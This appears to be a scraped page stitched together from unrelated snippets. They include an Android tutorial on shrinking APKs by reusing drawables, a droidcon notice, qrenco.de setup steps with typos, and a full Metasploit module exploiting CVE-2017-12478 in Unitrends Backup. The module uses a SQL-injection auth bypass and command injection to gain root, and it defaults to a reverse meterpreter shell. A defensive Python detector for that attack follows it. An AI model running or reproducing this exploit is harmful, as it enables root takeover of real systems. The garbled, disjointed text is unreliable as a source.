Proofpoint have also warned how other threat actors are likely to follow in attempting to exploit this relatively fresh vulnerability while they still can.

Via zdnet.com
- 1
There are already many good articles on "How to reduce the size of an apk". My focus in this article will be on "Reuse of resources". Resources contribute a major chunk of the size of an apk. The techniques that I'll be mentioning here only take a few lines of changes and will save a great deal of space.

# Use RotateDrawable resources

Many times, resources are nothing but a rotated version of some other resource, e.g. the collapse arrow and expand arrow: arrow_up.xml can be easily drawn using arrow_down.xml. Create a file named arrow_up.xml in the res/drawable folder like this:

    <?xml version="1.0" encoding="utf-8"?>
    <!-- res/drawable/arrow_up.xml: reuses arrow_down, rotated by 180 degrees -->
    <rotate xmlns:android="http://schemas.android.com/apk/res/android"
        android:drawable="@drawable/arrow_down"
        android:fromDegrees="180"
        android:pivotX="50%"
        android:pivotY="50%"
        android:toDegrees="180" />

# Use setColorFilter for resources with different colour versions

In this example, three different versions of the same icon are used. Instead of using three different icon sets, we can easily use setColorFilter to produce the other two icons from the first one. To achieve this, we can create a custom view that extends ImageView and apply a color filter in its constructor by passing the desired color in its xml attributes.

We'll need:

- CustomColorIconView.java — class that extends ImageView
- attrs.xml — styleable for the color attribute

    // CustomColorIconView.java
    import android.annotation.TargetApi;
    import android.content.Context;
    import android.content.res.TypedArray;
    import android.graphics.PorterDuff;
    import android.os.Build;
    import android.util.AttributeSet;
    import android.widget.ImageView;

    public class CustomColorIconView extends ImageView {

        public CustomColorIconView(Context context) {
            super(context);
        }

        public CustomColorIconView(Context context, AttributeSet attrs) {
            super(context, attrs);
            init(context, attrs);
        }

        public CustomColorIconView(Context context, AttributeSet attrs, int defStyleAttr) {
            super(context, attrs, defStyleAttr);
            init(context, attrs);
        }

        @TargetApi(Build.VERSION_CODES.LOLLIPOP)
        public CustomColorIconView(Context context, AttributeSet attrs, int defStyleAttr, int defStyleRes) {
            super(context, attrs, defStyleAttr, defStyleRes);
            init(context, attrs);
        }

        // Read dciv_color from the xml attributes and tint the drawable with it
        private void init(Context context, AttributeSet attrs) {
            TypedArray typedArray = context.obtainStyledAttributes(attrs, R.styleable.CustomColorIconView);
            // Only apply the filter when the attribute is set: the default of 0 (transparent)
            // combined with SRC_ATOP would otherwise make the icon invisible
            if (typedArray.hasValue(R.styleable.CustomColorIconView_dciv_color)) {
                int color = typedArray.getColor(R.styleable.CustomColorIconView_dciv_color, 0);
                setColorFilter(color, PorterDuff.Mode.SRC_ATOP);
            }
            typedArray.recycle();
        }

        // Change the tint at runtime; -1 clears the filter and shows the original icon
        public void setImageFilterColor(int color) {
            if (color == -1) {
                setColorFilter(null);
            } else {
                setColorFilter(color, PorterDuff.Mode.SRC_ATOP);
            }
        }
    }

    <!-- res/values/attrs.xml -->
    <resources>
        <declare-styleable name="CustomColorIconView">
            <attr name="dciv_color" format="color"/>
        </declare-styleable>
    </resources>

That's it. Now to use this in your xml, create a CustomColorIconView and set dciv_color to whatever color you need. In this case, we changed the dark location icon to white.

    <!-- layout.xml: xmlns:app is needed for the custom attribute; the view must be
         referenced by its fully qualified name, so replace com.example (a placeholder)
         with the package that declares CustomColorIconView -->
    <com.example.CustomColorIconView
        xmlns:android="http://schemas.android.com/apk/res/android"
        xmlns:app="http://schemas.android.com/apk/res-auto"
        android:layout_width="wrap_content"
        android:layout_height="wrap_content"
        android:src="@drawable/ic_location_dark"
        app:dciv_color="@color/white" />

That's all for this post! Will keep posting interesting snippets about Android and other things. Follow me to get updates :) Thanks for reading this article. Be sure to clap/recommend as much as you can and also share with your friends. It means a lot to me.

Source
- 2
#droidconDE 2017: Garima Jain - Dagger 2 Android: Defeat the Dahaka - DAY 1

Almost 1200 attendees converged at the ninth annual droidcon Berlin, co-located for the first time with IFA (Internationale Funkausstellung), one of the world's largest consumer electronics shows.

Playlist: https://droidcon.de/en/program/sessions
- 1
It was discovered that the api/storage web interface in Unitrends Backup (UB) before 10.0.0 has an issue in which one of its input parameters was not validated. A remote attacker could use this flaw to bypass authentication and execute arbitrary commands with root privilege on the target system.

    ##
    # This module requires Metasploit: https://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##

    class MetasploitModule < Msf::Exploit::Remote
      Rank = ExcellentRanking

      include Msf::Exploit::Remote::HttpClient
      include Msf::Exploit::CmdStager

      def initialize(info = {})
        super(update_info(info,
          'Name'            => 'Unitrends UEB 9 http api/storage remote root',
          'Description'     => %q{
            It was discovered that the api/storage web interface in Unitrends Backup (UB)
            before 10.0.0 has an issue in which one of its input parameters was not validated.
            A remote attacker could use this flaw to bypass authentication and execute
            arbitrary commands with root privilege on the target system.
          },
          'Author'          =>
            [
              'Cale Smith',   # @0xC413
              'Benny Husted', # @BennyHusted
              'Jared Arave'   # @iotennui
            ],
          'License'         => MSF_LICENSE,
          'Platform'        => 'linux',
          'Arch'            => [ARCH_X86],
          'CmdStagerFlavor' => [ 'printf' ],
          'References'      =>
            [
              ['URL', 'https://support.unitrends.com/UnitrendsBackup/s/article/ka640000000TO5PAAW/000005756'],
              ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2017-12478'],
              ['CVE', '2017-12478'],
            ],
          'Targets'         =>
            [
              [ 'UEB 9.*', { } ]
            ],
          'Privileged'      => true,
          'DefaultOptions'  =>
            {
              'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp',
              'SSL'     => true
            },
          'DisclosureDate'  => 'Aug 8 2017',
          'DefaultTarget'   => 0))

        register_options(
          [
            Opt::RPORT(443),
            OptBool.new('SSL', [true, 'Use SSL', true])
          ])

        deregister_options('SRVHOST', 'SRVPORT')
      end

      # substitute some characters
      def filter_bad_chars(cmd)
        cmd.gsub!("\\", "\\\\\\")
        cmd.gsub!("'", '\\"')
      end

      def execute_command(cmd, opts = {})
        session = "v0:b' UNION SELECT -1 -- :1:/usr/bp/logs.dir/gui_root.log:0" # SQLi auth bypass
        session = Base64.strict_encode64(session) # b64 encode session token

        # substitute the cmd into the hostname parameter
        parms = %Q|{"type":4,"name":"_Stateless","usage":"stateless","build_filesystem":1,"properties":{"username":"aaaa","password":"aaaa","hostname":"`|
        parms << filter_bad_chars(cmd)
        parms << %Q|` &","port":"2049","protocol":"nfs","share_name":"aaa"}}|

        res = send_request_cgi({
          'uri'           => '/api/storage',
          'method'        => 'POST',
          'ctype'         => 'application/json',
          'encode_params' => false,
          'data'          => parms,
          'headers'       => {'AuthToken' => session}
        })

        if res && res.code != 500
          fail_with(Failure::UnexpectedReply, 'Unexpected response')
        end

      rescue ::Rex::ConnectionError
        fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
      end

      def exploit
        print_status("#{peer} - pwn'ng ueb 9....")
        execute_cmdstager(:linemax => 120)
      end
    end

Source
- 1
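As an added example (not part of the post or of the Metasploit module above), a small check a defender could run over web-server access records for the Unitrends api/storage endpoint: it decodes the AuthToken header and flags the SQL-injection marker the module relies on, and also flags shell metacharacters in the hostname field of the JSON body. The record layout and field names are constructed assumptions, not the appliance's real log format.

```python
import base64
import json
import re

# Constructed sample access records (not real traffic): a benign request and
# one carrying the auth-bypass token quoted in the module above plus a backtick
# command in the hostname field. Field names are assumptions about the log.
SAMPLE_RECORDS = [
    {"uri": "/api/storage", "method": "POST",
     "auth_token": base64.b64encode(b"v0:deadbeef:1:/usr/bp/logs.dir/gui_root.log:0").decode(),
     "body": '{"type":4,"properties":{"hostname":"nas1.local","port":"2049","protocol":"nfs"}}'},
    {"uri": "/api/storage", "method": "POST",
     "auth_token": base64.b64encode(b"v0:b' UNION SELECT -1 -- :1:/usr/bp/logs.dir/gui_root.log:0").decode(),
     "body": '{"type":4,"properties":{"hostname":"`id` &","port":"2049","protocol":"nfs"}}'},
]

SQLI_MARKERS = re.compile(r"'\s*(union|or|and)\b|--|/\*", re.IGNORECASE)
SHELL_METACHARS = re.compile(r"[`;&|$<>]")


def decode_token(token):
    """Return the decoded AuthToken text, or None if it is not valid base64."""
    try:
        return base64.b64decode(token, validate=True).decode("utf-8", "replace")
    except (ValueError, TypeError):
        return None


def inspect_record(rec):
    """Return findings for one request to /api/storage; an empty list means clean."""
    findings = []
    if rec.get("uri") != "/api/storage":
        return findings
    decoded = decode_token(rec.get("auth_token", ""))
    if decoded is None:
        findings.append("auth token is not valid base64")
    elif SQLI_MARKERS.search(decoded):
        findings.append("sql injection marker in decoded auth token")
    try:
        props = json.loads(rec.get("body", "")).get("properties", {})
    except (ValueError, AttributeError):
        props = {}
    hostname = str(props.get("hostname", "")) if isinstance(props, dict) else ""
    if SHELL_METACHARS.search(hostname):
        findings.append("shell metacharacter in hostname field")
    return findings


def scan(records):
    """Map record index to its findings, keeping only records that have any."""
    results = {i: inspect_record(r) for i, r in enumerate(records)}
    return {i: f for i, f in results.items() if f}
```

Any hit on the decoded token is worth an alert on its own, since a legitimate session token for this endpoint never contains a quote or a SQL comment.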
Browser? Check whether it comes from Flash.
Which Windows are you using? Which sound card? etc.
Usage

The service is used to generate QR-codes for strings in a UNIX/Linux console using curl/httpie/wget or similar tools. The service can be used in a browser also. Just add qrenco.de/ before the URL. The service uses libqrencode to generate QR-codes.

Installation

You don't need to install the service to use it (just try curl qrenco.de), but if you want to install it locally, do the following steps:

    $ git clone https://github.com/chubin/qrenco.de
    $ cd qrenco.de
    $ virtualenv ve
    $ ve/bin/pip install -r requirements.txt
    $ sudo apt-get install libqrenv
    $ ve/bin/python bin/srv.py

If you want to use an HTTP frontend for the service, configure it this way:

    server {
        listen 80;
        listen [::]:80;

        server_name qrenco.de *.qrenco.de;

        access_log /var/log/nginx/qrenco.de-access.log;
        error_log /var/log/nginx/qrenco.de-error.log;

        location / {
            proxy_pass http://127.0.0.1:8003;

            proxy_set_header Host $host;
            proxy_set_header X-Real-IP $remote_addr;
            proxy_set_header X-Forwarded-For $remote_addr;

            client_max_body_size 10m;
            client_body_buffer_size 128k;

            proxy_connect_timeout 90;
            proxy_send_timeout 90;
            proxy_read_timeout 90;

            proxy_buffer_size 4k;
            proxy_buffers 4 32k;
            proxy_busy_buffers_size 64k;
            proxy_temp_file_write_size 64k;

            expires off;
        }
    }

Download: grenco.de-master.zip

or

    git clone https://github.com/chubin/qrenco.de.git

Sources:
http://qrenco.de/
https://github.com/chubin/qrenco.de
I think an embed for https://asciinema.org/ would be useful, especially in the Tutorials section.